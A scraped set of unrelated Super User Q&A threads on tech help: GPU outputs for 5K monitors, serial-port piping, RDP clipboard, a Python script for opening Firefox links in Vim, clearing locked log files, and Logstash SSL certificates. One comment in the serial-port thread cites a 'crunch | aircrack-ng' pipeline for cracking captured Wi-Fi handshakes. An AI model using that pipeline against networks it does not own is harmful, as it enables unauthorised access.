by reading status register,u can give a command to peripheral by writing data to command register so why a lot of pins are used for addressing PCI devices if cpu talks with device registers with limited count? – spartacusNov 26, 2014 at 15:54These address pins are used for accessing whole PCI device memory, not just for accesing few tiny command registers. Commands are only used for something like "hello PCI card, I wrote 1GB of data in your memory, start working on it". – KamilNov 26, 2014 at 16:06But I may be wrong at some details. Please refer to PCI specyfications if you want more reliable information source. – KamilNov 26, 2014 at 16:10Add a comment | 
GPU to drive three monitors
multiple-monitors;gpu;multiple-monitors;gpu
GPU to drive three monitors Ask Question
0 I believe the answer you are looking for is the graphic card 'Video Memory' specification.In graphic cards, it all comes down to a few specs to let you know how good will the card perform.Core clock - measured in MHz (ie.: 742MHz)**Video Memory** - in MB/GB (ie.: 1280MB or 1GB)Memory interface - usually in bits (ie.: 320-bit)Memory clock - in MHz too (ie.: 3800MHz )Core clock is basically the raw performance of the video card; it is the speed at which the card operates and which is also similar to memory clock. In gaming, it is the biggest responsible for high fps output.Memory Interface is like a communication "channel" used between the core and memory, and the larger this value is, the more data can be exchanged between these two simultaneously. Not the most important, but also plays a fundamental role when it comes to big memory hog systems as it is the case with triple monitor. So, in your case I would definitely look for the Video Memory specification keeping an eye on memory interface.The higher this value is, the more pixels it may easily render. Also be sure to watch for the "Maximum Resolution" of the card to see if it meets your "2560x1440" requirement.ShareImprove this answer Follow answered Nov 26, 2014 at 15:39user3433507user3433507112I don't believe this is sufficient. Many graphics cards have plenty sufficient video memory but don't have enough output ports, and so couldn't possibly support three monitors. – ChrisInEdmontonNov 26, 2014 at 16:30Add a comment | 
What specs must a graphics card have to power a 5K monitor?
display;graphics-card;high-resolution;display;graphics-card;high-resolution
What specs must a graphics card have to power a 5K monitor? Ask Question
14 You need a card with two DisplayPort 1.2 outputs. DVI connections are not used by this monitor.Edit: this monitor connects with two DP cables and each cable appears as a single logical screen (there is no MST involved). So there is no requirement for the card to support more than two logical screens (which can be problematic for some Nvidia cards). Any card with two DP1.2 will be fine, therefore.Many go on about how current video cards don't have the raw power for 5k, but unless you are gaming this is a non-issue. (Or unless you have other specialized 3D requirements, but if so you know what they are.) For ordinary use (which includes programming, web browsing, productivity applications, mail and so on) there is absolutely no performance issue with any recent video card. (I drive two UP2715Ks from one Nvidia NVS 510 card, which doesn't have a high-powered GPU.)The problems are not in the number of rendering pipelines, GPU clock speed, etc. but just in whether the card has the right DisplayPort 1.2 outputs - and, perhaps, a smart enough driver to tile together two outputs into one desktop. If it has them, it will be adequate in other respects too.Photo editing does need more power for higher resolutions, but this depends more on the resolution of the input file than on the monitor you're using (and in any case is usually CPU-bound not GPU-bound). Dell says "Supported cards include: NVidia Kx000, NVidia x200 series, and AMD Wx100 series.".These are all professional cards and so cost more than a GeForce, without necessarily better performance, but the K2000 and K2200 are reasonably inexpensive. The NVS 510 also works (my experience). The same Windows driver from Nvidia handles all of these NVS and Quadro cards. (The NVS 310 is tested working but only at 30Hz refresh.)Nowadays, though, the prices of the low-end Quadro cards have fallen so it may not be worth bothering with the slower NVS ones. I'm currently using Quadro M2000s on one machine and a Quadro P600 on another.Although the NVS 510 card works perfectly to drive one or even two UP2715Ks at full resolution, I had the experience that Nvidia's support desk denied that any cards supported 5k -- even though support for it was mentioned in the release notes. That was in 2015 or so and has surely changed now. But it underlines the general point that what works and what Nvidia (or any company) calls 'supported' are not the same thing. You may also get one part of a company disagreeing with another part about what's supported.(Slightly off topic: Note that if you want to drive 4k displays not 5k ones, the number of them you can drive from a Nvidia card usually depends on whether the display uses MST or not. A card like the NVS 510 with four outputs can drive four displays, but only two if each display uses MST to appear as two logical screens. This applies to some older 4k monitors like the Dell UP2414Q.)ShareImprove this answer Follow edited Sep 19, 2018 at 14:32 answered Feb 6, 2015 at 14:52Ed AvisEd Avis45855 silver badges1010 bronze badges5RE the NVS 510 -- that board looks great. The specs say it can can drive 3840x2160 at 60 hz. nvidia.com/object/nvs-510-graphics-card.html#pdpContent=2 Do those specs mean 3840x2160 PER VIDEO PORT (e.g. 4 displays, each at 3840x2160 ) or PER BOARD (meaning ONE display at 3840x2160 for the board) ? – Jonesome Reinstate MonicaSep 27, 2015 at 17:591Not sure about NVS 310, I succeded with two 4k monitors in 30Hz so far. Officially NVS 310/315 doesn't support 4k - nvidia.com/object/nvs-product-overview.html , but NVS 510 does. – IgorKNov 4, 2016 at 9:131Can confirm the NVS 310 does NOT work. When the second DP cable is attached it tries to switch to 5K 30Hz, but the output is only the right hand side stretched to fill the screen. It's impossible to get any working 5K image from the 310, even at 30Hz. The only NVS card listed as supported on the Nvidia driver help page for 5K is the NVS 510. – DarkSep 14, 2018 at 23:41Disregard my previous comment, after receiving an NVS 510 and testing it, I encountered a similar issue to the 310. It turned out to be a bad cable. I can confirm the NVS 310 IS capable of 5K, but only at 30hz. – DarkSep 19, 2018 at 11:15Moderators -- please can you review the comments and delete those which have now been incorporated into the answer. – Ed AvisSep 19, 2018 at 14:35Add a comment | ; 5 You need to have two DisplayPort 1.2 connections in order to run at 5120x2880 with 60Hz refresh rate. A GeForce GTX 960 is currently the cheapest way to get proper support for 5K on this Dell monitor. As mentioned, as long as you only want to use it for everyday work (CUDA acceleration in certain Adobe applications such as After Effects or Premiere may want some extra power), you'll be fine for GPU power.ShareImprove this answer Follow edited Feb 12, 2015 at 16:40Jason7,35544 gold badges2727 silver badges4242 bronze badges answered Feb 6, 2015 at 21:28Calum_54321Calum_543215111 silver badge33 bronze badges6Maximum output resolution is listed on the Nvidia website: geforce.co.uk/hardware/desktop-gpus/geforce-gtx-960/… – Calum_54321Feb 6, 2015 at 21:34I suggest the Nvidia NVS 310 is cheaper than the GTX960 (about $80 vs $200) and I believe it will also work to get 5120x2880 @ 60Hz. – Ed AvisFeb 12, 2015 at 16:371@EdAvis Not according to nVidia themselves... – JasonFeb 13, 2015 at 4:55That page is not correct. The NVS 510 works fine to drive the UP2715K, despite a "max digital display support" in that page of 3840x2160. Also, the NVS 310 works fine to drive 4k monitors such as the UP2414Q, despite the page saying its max is 2560x1600. Since the page is wrong about those things, I would caution against using it to determine whether the UP2715K will work with the NVS 310. My hunch is it will. – Ed AvisFeb 13, 2015 at 9:45@EdAvis did NVS 310 work in 4k 60Hz for you? 30Hz only for me :( – IgorKNov 4, 2016 at 9:14 | Show 1 more comment; 1 Nvidia announces 5K-ready GeForce GTX Titan Z graphics cardFrom TechRadar reportShareImprove this answer Follow answered Nov 26, 2014 at 16:47RedGrittyBrickRedGrittyBrick80.5k1919 gold badges132132 silver badges201201 bronze badges6Wow - look at the price tag on that! – David KirklandNov 26, 2014 at 16:58A quick check of the specs shows that the GTX 980 supports the same output resolution (4096x2160). Granted, it won't deliver the same frame rates when gaming, but am I right in assuming that in could support a 5k monitor? – David KirklandNov 26, 2014 at 17:18Checks the product specifications; if it supports 5k resolution; that should answer your question. – RamhoundDec 1, 2014 at 20:464096x2160 isn't 5k though; so that should answer your question; its 4k btw – RamhoundDec 1, 2014 at 20:47@Ramhound Yes, 4096x2160 isn't 5K. I am unclear how things are affected by the dual display-port outs, which was really the root of my confusion. I obviously need to visit Tom's hardware to research things a little more. Thanks for the clarification. – David KirklandDec 1, 2014 at 21:47 | Show 1 more comment; 0 This thread has not been updated for couple of years. Likewise with the related thread.Driving two Dell UP2715K monitorsThe latest GPUs from Nvidia [1060/1070/1080] sport 3x DP(1.4) & 1x Hdmi(2.0) ports. So it seems likely they they can only run 1x 5k monitor each (via MST).Likewise with the latest GPU set from AMD [460,470,480]. However these are a bunch cheaper & lower-spec. The Apple iMac(2015)27"(Retina) uses the previous generation AMD 380/390/395/395X cards. And all of these run one external 5k monitor (via MST). So all of the AMD/4 cards should be Ok.The Nvidia Quadro M2000 & M4000, with 4x DP ports, would also seem to be good options - & possibly able to run 2x 5k monitors. Thou the official specs say Not. Which is unfortunate.They recommend the Quadro P5000 & P6000 cards. Which can run 2x 5k monitors each. But they are VERY expensive! We need to run 4x 5k monitors - for business uses, not gaming. So the best choice would probably be the AMD/480/8Gb cards, one per 5k monitor. This goes against the standard principle of - One strong CPU is preferable to multiple lesser cards.However, it would seem to be the cost-effective solution. Even thou the PC would need to be slotted to accommodate so many cards, with extra power supply, Mb capacity etc.Perhaps other punters can improve on this. Would be curious to hear of user experience with the NVS-810, released late 2015, which has 8x DP.ShareImprove this answer Follow edited Mar 20, 2017 at 10:17CommunityBot1 answered Jan 7, 2017 at 12:26Rick McDixonRick McDixon122 bronze badges1At work, I currently run two UP2715Ks from a single Quadro K2000 card. (A second K2000 in the same machine drives one more.) At home I am using K4000 cards, one per UP2715K. Please don't make the mistake of fixating on the 'supported' resolution according to Nvidia. It is rarely the limit of what is possible. – Ed AvisNov 5, 2017 at 15:30Add a comment | ; -4 In my opinion u can use the AMD R9 M295X but this is the same one which is already implemented in 5k display in the new iMac.ShareImprove this answer Follow answered Nov 27, 2014 at 9:47StefanSStefanS722 bronze badges3Thanks for this. It seems like this card cannot handle 5K without modification, as described here: extremetech.com/gaming/… – David KirklandNov 27, 2014 at 11:01oh ok, I wasn't sure with this one but thanks for the lesson. – StefanSDec 3, 2014 at 11:16Please delete this answer. – vharronJun 26, 2017 at 17:34Add a comment | 
Using a tunnel to connect to another PC on my home network
ssh;tunnel;ssh-tunnel;ssh;tunnel;ssh-tunnel
Using a tunnel to connect to another PC on my home network Ask Question
0 I think the port setup is ok. But your connection to the internet should have an static IP, or some sort of DNS service, so you can find your computer. Then said router should be servicing the port 8080 to the 192.168.1.x.Back in 05(or so) I used to use noip.com which at the used an app on your pc and gave you a url like www.noip.com/doctordoodad which when pinged resolved to your pc.ShareImprove this answer Follow answered Dec 13, 2017 at 20:18dmbdmb1,21699 silver badges1313 bronze badgesAdd a comment | 
Echo/Pipe command output to Serial line
linux;command-line;serial-port;arduino;linux;command-line;serial-port;arduino
Echo/Pipe command output to Serial line Ask Question
4 I think the following command should work:( stty raw speed 115200 >&2; echo -ne 'output-string' ) >/dev/ttyUSB0 <&1Note:this launches a shell with input and output redirected to your output device;input needs redirection because stty works on the standard input device, while its diagnostic output should still be directed to the launching terminal;stty raw stops extraneous characters being added to the output;echo -n stops the implicit new-line at the end of the string, while echo -e allows bask-slashed escape sequences to produce non-printable characters if your device requires it;and a subshell is needed so that /dev/ttyUSB0 isn't closed and reopened, which may reset its settings.Do not redirect standard error: you don't want error messages sent to the device!I have tested this on /dev/tty1 and it seems to work, but I don't have a serial device to verify it completely. I needed to be in a root shell for the command to work, but your permissions may allow it from a user shell.ShareImprove this answer Follow answered Nov 28, 2014 at 21:34AFHAFH17k33 gold badges3030 silver badges4848 bronze badges5would this work piping from another program? this looks very similar to a question i currently have a bounty on. superuser.com/questions/1300782/… – Tim_StewartMar 12, 2018 at 0:46By another program, do you mean something which will generate output strings instead of echo (though I don't understand where the piping comes in)? If so, yes, of course. Without testing, which I can't easily do now, I can't be sure if you can read responses, which wasn't a requirement of the question. You'll need to try it. – AFHMar 12, 2018 at 1:08the program i had in mind was crunch in kali linux. where you can pipe it to other programs using "crunch 4 4 abcd | aircrack-ng *.cap" for instance. but instead of piping it to a program sending the output through a serial connection. i'm open to any suggestions. i believe you can also output it to a file if that makes this easier? – Tim_StewartMar 12, 2018 at 1:23You could use a sub-subshell or command grouping { ...; }, but it's probably easier to replace the echo command with a function or script name, and do whatever you need to within that. – AFHMar 12, 2018 at 1:45Thank you very much for the suggestion. If it works I'll send you a message to claim the bounty on my question! – Tim_StewartMar 12, 2018 at 1:50Add a comment | ; 0 Have you tried simply directing stdout to the /dev/ttyUSB0 (command-that-gives-stdout > /dev/ttyUSB0)? I would think that the OS would handle any buffering and baud rate conversion for you.ShareImprove this answer Follow answered Nov 26, 2014 at 18:43Greg TarsaGreg Tarsa4122 bronze badgesAdd a comment | 
Copy and Paste through RDP/Internet
remote-desktop;copy-paste;remote-desktop;copy-paste
Copy and Paste through RDP/Internet Ask Question
4 Windows has APIs that allow you to view what's on the clipboard (and receive notifications when the contents change). It also has APIs that allow you to place items on the clipboard.RDP interacts with the clipboard on both the server and client. When you copy something, RDP will synchronise the item across on the clipboards of both machines, allowing you to paste it on either (I'm not sure if it transfers data at the time of copying, or time of pasting; either is possible).Also, you are "connected to the other machine's network". Not as directly as a local network, but you must have a network connection of some sort for RDP to work at all. The internet is just one giant network, after all.See also (note that the APIs mentioned in those blog posts are the older ones; Vista introduced newer clipboard APIs but the basic principle is similar):https://devblogs.microsoft.com/oldnewthing/20080604-00/?p=22073https://web.archive.org/web/20151215195718/http://blogs.msdn.com:80/b/rds/archive/2006/11/16/why-does-my-shared-clipboard-not-work-part-1.aspxIn the local session the TS client is in the clipboard viewer chain and in the remote session the RDPCLIP virtual channel application is in the viewer chain. When a clipboard update happens in the local session, the TS client is notified and informs RDPCLIP of the changes so it can propagate them to the remote session. Similarly, when a clipboard update happens in the remote session, RDPCLIP is notified and informs the TS client of the changes.ShareImprove this answer Follow edited Jun 28, 2022 at 15:44Glorfindel4,05988 gold badges2323 silver badges3737 bronze badges answered Oct 22, 2014 at 13:21BobBob60k2424 gold badges185185 silver badges213213 bronze badgesAdd a comment | 
Firefox — How to open a link (to any text-based file) in Vim?
windows;google-chrome;firefox;vim;gvim;windows;google-chrome;firefox;vim;gvim
Firefox — How to open a link (to any text-based file) in Vim? Ask Question
1 First of all, Firefox bases the settings in "Choose Helper Application" on system settings, so there's no simple way to configure that.An even better solution, usability-wise, is to use the Firefox extension called "Open With" https://addons.mozilla.org/en-US/firefox/addon/open-with/It says it's for web browsers, but it turns out it could be any program — it just calls he program with the URL as the first argument.Next, I wrote a Python script:import sys, os, re, tempfile, urllib, urlparse, timehandler, url = sys.argv[1:3]match = re.match(r".*(\.[A-Za-z_]+)$", urlparse.urlparse(url).path)tmpfile, tmpfile_path = tempfile.mkstemp(suffix=match.group(1) if match else '')os.close(tmpfile)print "Downloading to temp file ..."urllib.urlretrieve(url, tmpfile_path)#Normally it would try to clean up the file we urlretrieved after this Python#process ends. Thank BDFL there are no access restrictions on private variables.urllib._urlopener._URLopener__tempfiles = []os.execlp(handler, handler, '%s' % tmpfile_path)#We don't attempt to delete the temporary file because:# 1. Firefox also doesn't in such cases.# 2. It's problematic in some instances, such as when the subprocess (this#script used to call the handler in a subprocess) finds another copy#of itself running, hands the file over to it and exits. Meanwhile, we#would be over here deleting the file while the subprocess'es brother#hadn't tried to open it yet.What it does:Makes a unique filename in the user's Temp directory (same place where Firefox stores files in such cases).Makes sure that the extension of the temp file will be sane, even with a URL including query strings and hash-anchors (urlretrieve(..) without a second argument handles the former, but not the latter). This is useful, because it tells Vim how to syntax-highlight the file.Downloads the file from the URL to the current user's Temp directory.Opens the file with gvim.exe (or an editor of your choice — see below).How to use this solution:Save the above Python script as open_with.py somewhere where you keep such scripts.Install the Open With Firefox extension at the above link and restart Firefox.Go to Tools > Add-ons > Extensions > Open With > Options. There:(a). (Unless you plan to use Open With for its intended purpose, "Hide"all the browsers in the list.)(b). "Add..." python.exe.(c). Set its "Arguments..." to the path of the script followed by the editor's executable filename or path. For me, this would be C:\E\infrastructure\open_with.py gvim.exe(d). "Rename..." it to "gVim".Make sure that gvim.exe is in the PATH variable. I recommend the EditPATH Autohotkey script, which is compilable to an EXE using AHK tools (place it into the Quick Launch folder for convenience — editing PATH becomes three clicks, rather than having to go through the Control Panel memory test yet again.) Otherwise, you must supply the whole path of gvim.exe in step 3(c).That's it. Now find a link to a file in Firefox, right-click it, and choose "Open Link with gVim". (Guess how I got the correct icon there :)Bonus: if you set the relevant setting in the Open With extension's Options, you can right-click on a Firefox tab and open (most) web pages in Vim too — i.e. like "View Source" except using Vim.Note that this solution applies just as well to Emacs, Notepad++, and many other software not restricted to text editors. For example, I just tried it with The GIMP, and it opened a PNG file. (To do that, replace gvim.exe above with the path to GIMP. Note: to open an arbitrary image this way, not just a link, you could View Image, and then right-click on its tab.)Historical note: initially I went for writing a BAT script, but that became untenable after it failed on this test case: http://evgeni.org/w/api.php?format=xml&action=query&titles=AutoHotkey_shortcuts&prop=revisions&rvprop=content That's because cmd.exe has problems with arguments containing the = character. Furthermore, it was not just a matter of calling gvim.exe with the URL as the command-line argument (though Vim does accept URLs), because it cannot handle this test case — just opens a blank instance of Vim. And for parsing the URL, I'd have to resort to Powershell, which restricts the portability of the solution somewhat. In the end I decided that having an installation of Python as a prerequisite isn't too much to ask.ShareImprove this answer Follow answered Oct 22, 2014 at 12:40Evgeni SergeevEvgeni Sergeev1,83544 gold badges2323 silver badges3737 bronze badgesAdd a comment | 
Restore Desktop Folder Windows 8.1
windows-8.1;windows-8.1
Restore Desktop Folder Windows 8.1 Ask Question
4 Try this:Go to This PC, right click Pictures.Click Properties.Click Location. See if it's pointing desktop folder.If so, click Restore Default.That should do it.ShareImprove this answer Follow answered Oct 22, 2014 at 13:48HaploHaplo43622 silver badges88 bronze badgesAdd a comment | 
Receive email alert when someone I follow on Twitter posts specific keyword
email;monitoring;twitter;alert;email;monitoring;twitter;alert
Receive email alert when someone I follow on Twitter posts specific keyword Ask Question
2 You can use IFTTT (If This Then That) for this.It is a cloud solution that is meant to couple various cloud services.There is already a recipe that does exactly this. You do not need to enter your twitter handle or password.It uses an RSS feed from twitter which contains your keyword, when a new entry occurs an e-mail will be sent.https://ifttt.com/recipes/68383-twitter-keyword-to-emailYou can adjust this recipe to use a different RSS feed generated by different search results.To generate this RSS feed see the Advanced Search page on Twitter.ShareImprove this answer Follow edited Oct 23, 2014 at 11:37 answered Oct 22, 2014 at 12:46aaireyaairey19666 bronze badges31This sounds very close to what I want, but how would I limit the RSS feed to only specific handle(s)? I do not want to receive 1000s of alerts for ALL sales on Twitter :) – AnitiOct 23, 2014 at 10:07You can write your own search query, and use that RSS feed in the IFTTT recipe. twitter.com/search-advanced I've edited my answer to reflect this. – aaireyOct 23, 2014 at 11:36Well, there was no RSS feed but I could make IFTTT use Twitter search. – AnitiOct 27, 2014 at 16:36Add a comment | ; 0 You can also use my website https://www.MyTweetAlerts.com it offers those features you are requesting. ShareImprove this answer Follow answered Sep 25, 2018 at 14:25ImagereeImageree27711 gold badge66 silver badges1818 bronze badgesAdd a comment | 
Linux Mint is showing month name in a language other than English
linux-mint;linux-mint
Linux Mint is showing month name in a language other than English Ask Question
1 I had the same problem!Solution:go to System->Languageremove Hebrew language (i make it, but may be it's not necessary, try before step 3 & 4)select English, United Stated and click Apply System-Widelogout and login.ShareImprove this answer Follow answered Dec 7, 2014 at 9:34tapin13tapin132633 bronze badgesAdd a comment | 
How does windows know which program has the lock on a particular file while trying to copy it?
windows-8.1;operating-systems;process;windows-8.1;operating-systems;process
How does windows know which program has the lock on a particular file while trying to copy it? Ask Question
0 All versions of Windows always "knew" what executable had a lock on a file, it just provide you with any information when trying to move a locked file. You could see this information in older versions of Windows with programs like FileMon. In newer versions of Windows the Resource Monitor could provide that information, but it was not an easy interface to use. I assume the Windows 8 just associates the executable with the lock on the file with the File description in the properties of the executable. See the image below, it is a screenshot of the properties of acrord32.exe.ShareImprove this answer Follow edited Oct 22, 2014 at 12:24 answered Oct 22, 2014 at 12:18KeltariKeltari69.3k2626 gold badges171171 silver badges220220 bronze badges3My question isn't really about how Windows gets to know this information... Of course it would know... It gives all the primitives to the processes... My question is about how other processes get to know that the file has a lock by a particular application? In this case... The copy process precisely knows that acrobat reader is using it. – ShivamMaxOct 23, 2014 at 19:09I explained that in my answer – KeltariOct 23, 2014 at 20:45You could read that property only if you know that acrord32 was using it. The point is how would my process know which other process is using it? – ShivamMaxOct 24, 2014 at 8:50Add a comment | ; 0 All Windows since version 2000 allow you to manage file locks for network files and folders through Computer Management. If this is the case for you too, you can use this method to view and release the lock.Go to Control Panel -> Administrative Tasks -> Computer Management.On the left side, unvold Shared Folders then click Open Files.Some background infoWhen you perform an operation on a file, windows (or any other OS) will open the file either for read, read/write or random access. The last two require the file to be written to. Therefor windows will initiate a write-lock to a file, and mark this file on the harddrive's table of contents as being "written to", or "write-locked". Depending on what filesystem you use, there is or isn't information stored about what program writes to a file. For network access, this is not stored on the file but in a database which is accessible as described above. In other cases, the process ID is stored along the lock indicating where the lock originated from.When a process no longer needs to write to the file, it releases the lock, and as such removes the flag in the filesystem's table of content that the file is being written to.Unlock tools can remove the this flag at will, but if a process is actualy writing to a file, it can damage the file itself. However, sometimes a file is being opened for read/write or random access without there actually is being written to, yet the lock remains on it in case the user performs an action that requires to be written to the file at a later stage. Also it can happen that the program crashed before releasing the lock, yet somehow that lock is still in effect because part of the program that no longer is accessible to the user other than through either a service or idle process (you don't know which one). In that case unlockers or a reboot will help.Unlock tools are the most effective when either you don't want to reboot or a program that starts at boot locks a file and you simply get the lock on every boot. (think of spyware or utilities you want to move but can't. Note that if you can't move a utility because it is in use, you shouldn't move unless you know what you're doing.)ShareImprove this answer Follow answered Oct 22, 2014 at 12:37LPChipLPChip57.5k99 gold badges9292 silver badges135135 bronze badgesAdd a comment | 
Slipstream updates into Windows 7
windows-7;installation;iso-image;slipstream;windows-7;installation;iso-image;slipstream
Slipstream updates into Windows 7 Ask Question
1 Here is the answer from Jenteit looks like McAfee on my computer blocked something when using the DISM command. I've disabled McAfee, tested with some updates and it worked. I'm now trying this with all my updates.Here is the KB Article: https://kc.mcafee.com/corporate/index?page=content&id=KB76867ShareImprove this answer Follow edited Oct 28, 2014 at 10:09 community wiki 2 revs, 2 users 80%magicandre1981Add a comment | 
SSL handshake failure when using Logstash
ssl;ssl
SSL handshake failure when using Logstash Ask Question
0 If you are setting connections via hostname—instead of IP address—it seems from reading up on the issue here that the problem is Logstash now requires the SSL certificate for the host to have a CN (common name) set as well as generating the SSL without the -batch flag in place:Figured out the issue - looks like you need to generate the SSL certificate differently now. It must include the 'common name' (i.e. your servers hostname). In my case, I just dropped the -batch flag when generating the certificate causing openssl to ask me for the hostname.The command would be something like this from the command line of any machine with OpenSSL installed:openssl req -x509 -nodes -newkey rsa:2048 -keyout logstash-forwarder.key -out logstash-forwarder.crtThe logstash-forwarder.key and logstash-forwarder.crt can be changed to match your hostname if you wish. When you run that command you will see something like this:Generating a 2048 bit RSA private key.............................................+++..........+++unable to write 'random state'writing new private key to 'logstash-forwarder.key'-----You are about to be asked to enter information that will be incorporatedinto your certificate request.What you are about to enter is what is called a Distinguished Name or a DN.There are quite a few fields but you can leave some blankFor some fields there will be a default value,If you enter '.', the field will be left blank.-----Country Name (2 letter code) [AU]:USState or Province Name (full name) [Some-State]:New YorkLocality Name (eg, city) []:BrooklynOrganization Name (eg, company) [Internet Widgits Pty Ltd]:Some CompanyOrganizational Unit Name (eg, section) []:Common Name (e.g. server FQDN or YOUR name) []:my_hostname.localEmail Address []:And what I entered for this example was as follows; the most important item is the “Common Name” (CN)Country Name: USState or Province Name: New YorkLocality Name: BrooklynOrganization Name: Some CompanyOrganizational Unit Name: [I left this blank on purpose.]Common Name: my_hostname.localEmail Address: [I left this blank on purpose.]I personally like entering the country name, state & locality name since it helps me sort through these things, but those are really just icing on the cake. The “cake” itself is the hostname: my_hostname.local.Now that solution works for connections made via hostname. If the machine you have an issue with does not have a hostname, one should be setup. Or it should perhaps be set in the /etc/hosts file on the connecting machine to at least “trick” the setup to use a hostname.A user on that issue report posted a nice script to create a self-signed certificate for IP address use which is located here, but there should be a way to handle that from the command line directly as well. And looking at this site it seems that the issue is how to configure SSL requests with SubjectAltName while using OpenSSL.ShareImprove this answer Follow edited Oct 22, 2014 at 16:57 answered Oct 22, 2014 at 12:06Giacomo1968Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges21Worked, massive thanks. I read so much on this, I missed the line "I just dropped the '-batch' flag" – girlcoderOct 22, 2014 at 12:46@girlcoder All good & happy this worked out! FWIW, I have been doing this for years and certificate generation issues still give me headaches. Don’t sweat it. – Giacomo1968Oct 22, 2014 at 12:51Add a comment | 
How do I copy a column of numbers to another column while excluding cells with zero or blank?
windows-7;windows;microsoft-excel;windows-7;windows;microsoft-excel
How do I copy a column of numbers to another column while excluding cells with zero or blank? Ask Question
1 I think the advanced filter will do the trick.ShareImprove this answer Follow answered Oct 22, 2014 at 20:35Petr FedorovPetr Fedorov58522 silver badges77 bronze badgesAdd a comment | 
How to clear content of a lot of text files fast under Windows?
windows;windows-7;logging;text-editing;file-unlocking;windows;windows-7;logging;text-editing;file-unlocking
How to clear content of a lot of text files fast under Windows? Ask Question
0 I had the same situation as yours, where a log file is continuously written by some app and I have to clear the content without closing the app. Fortunately I have only 1 file and I can open it in Notepad++, press Ctrl+A then press Delete. In case there are multiple files just use the following PowerShell scriptGet-ChildItem -Recurse log*.txt | ForEach-Object { $fs = [IO.FileStream]::new($_.FullName, ` [IO.FileMode]::Truncate, [IO.FileAccess]::Write, [IO.FileShare]::Write) $fs.Close()}(Alternatively call $fs.SetLength(0) to truncate the file if [IO.FileMode] is not Truncate)This works because the log file was opened in FILE_SHARE_WRITE mode, contrary to many people's beliefs that you can't delete or edit a file in Windows while it's opened. Subsequent opens must also be in shared mode. That's why > or >> in cmd or PowerShell doesn't work, because they open the file normally. Here's a very simple C++ to demonstrate how to create a file in shared mode#define WIN32_LEAN_AND_MEAN #include <windows.h>#include <fileapi.h>#include <cstdlib>#include <ctime>#include <cstdio>int main() { srand(unsigned(time(nullptr))); const wchar_t* fileName = LR"(D:\logs\log1.txt)"; // Create file with shared read/write permission HANDLE h = CreateFile(fileName, GENERIC_WRITE, // open for writing FILE_SHARE_READ | FILE_SHARE_WRITE, // share for reading/writing NULL, // default security CREATE_NEW, FILE_ATTRIBUTE_NORMAL, // normal file NULL);// no attr. template if (h) { for (int i = 0; i < 100; i++) { DWORD n; char str[64]; int l = sprintf_s(str, sizeof str, "%d: %d\n", i, rand()); WriteFile(h, str, l, &n, NULL); FlushFileBuffers(h); Sleep(3000); } CloseHandle(h); }}It creates log1.txt and writes to it periodically. I also have the below PowerShell script to create another shared log file$fs = [IO.FileStream]::new('D:\logs\log2.txt', ` [IO.FileMode]::OpenOrCreate, [IO.FileAccess]::Write, [IO.FileShare]::ReadWrite)for ($i = 0; $i -lt 100; $i++) { $t = [Text.Encoding]::ASCII.GetBytes("$i $(Get-Random)`r`n") $fs.Write($t, 0, $t.Length); $fs.Flush() Sleep 3}$fs.Close()After that I ran the command on top and all the log files are clearedShareImprove this answer Follow answered Apr 5, 2022 at 16:10phuclvphuclv24.6k1313 gold badges105105 silver badges218218 bronze badgesAdd a comment | ; 0 Save the below code as a batch file and Run it.You can save the trouble of typing the command everytime :).Change M:\Newfolder\ & *.txt to reflect your path & log file extension respectively.@ECHO OFFsetlocal EnableDelayedExpansionFOR /R M:\Newfolder\ %%G IN (*.txt) DO ( TYPE nul > %%G)pauseUPDATEYou can try to create a Macro to automate what you want to do.Check out the first answer provided by ellak hereOpen all your Log Files at once and then Run this Macro Everytime.If you want to automate even that (opening all your Log Files at once) then Run the Batch Script below.@ECHO OFFsetlocal EnableDelayedExpansionFOR /R M:\Newfolder\ %%G IN (*.txt) DO ( notepad++.exe %%G)pauseSo the next time you want to clear your Log Files, SimplyRun the Batch Script providedRun the Macro from Notepad++There is a way to run them both from the same script but this requires NPPExec Plugins that I'm not too familiar with. Please let me know if you want it with the plugin or if the solution provided above will suffice.ShareImprove this answer Follow edited Apr 17, 2022 at 11:38phuclv24.6k1313 gold badges105105 silver badges218218 bronze badges answered Oct 22, 2014 at 11:56Dhiwakar RavikumarDhiwakar Ravikumar1,99955 gold badges2525 silver badges3838 bronze badges8The process cannot access the file because it is being used by another process – gstackoverflowOct 22, 2014 at 12:22That means the file is being used. You can't clear the contents of a file that you have opened (in notepad or some other application) – Dhiwakar RavikumarOct 22, 2014 at 12:23At this moment I can open this file using notepade++ and clear content and save file – gstackoverflowOct 22, 2014 at 12:581I thought the purpose of asking the question was to avoid doing it manually. Please try to find out the Application using these Logs. End it and run the script again. – Dhiwakar RavikumarOct 22, 2014 at 13:36Yes, I want to avoid make it manually. Application server keep these logs files. And I don't want to stop it. hotepade ++ allow this – gstackoverflowOct 22, 2014 at 13:45 | Show 3 more comments; 0 Just a thought if the file is being used and you can't clear it, and Notepad++ is allowing you to clear it why not just use a script in Notepad++ like @Dhiwakar Ravikumar mentioned?If scripts are out of the question, and assuming you have quite a bit of log files, why not just open them all in Notepad++, select the first open tab and hit Ctrl+A, then Delete key, then Ctrl+S, then Ctrl+W? That would select all the text in the file, delete it, save the file, then close it and then just do the same thing (like a script)ShareImprove this answer Follow edited May 1, 2022 at 12:13phuclv24.6k1313 gold badges105105 silver badges218218 bronze badges answered Oct 23, 2014 at 18:16trententrenten13511 silver badge99 bronze badgesAdd a comment | ; -1 From a command line:FOR /R C:\YourFolder %f IN (*.LOG) DO TYPE NUL>%fOr, from a batch file:FOR /R C:\YourFolder %%f IN (*.LOG) DO TYPE NUL>%%fShareImprove this answer Follow answered Oct 22, 2014 at 11:48aphoriaaphoria98699 silver badges1111 bronze badges8The process cannot access the file because it is being used by another process. – gstackoverflowOct 22, 2014 at 12:191How you clearing it manually? – aphoriaOct 22, 2014 at 12:22I open this file using notepade++ and clear content and save file – gstackoverflowOct 22, 2014 at 12:591If another process has the file locked, I'm not sure how you can be clearing and saving it. – aphoriaOct 22, 2014 at 16:561I have tried a lot of methods on this and they all involve doing quite a lot of work (installing software or programming). Your simplest answer is to boot into safe mode (command-line only) and the above solutions should work. This will be fine for a one-off, though not something to do regularly. I tried NP++ on a file held open for writing and got an error, effectively the same as you saw, so I don't know how it works for you. Which logs are you talking about? – AFHOct 22, 2014 at 17:00 | Show 3 more comments
Portrait primary display rotates touchpad
windows-7;multiple-monitors;touchpad;windows-7;multiple-monitors;touchpad
Portrait primary display rotates touchpad Ask Question
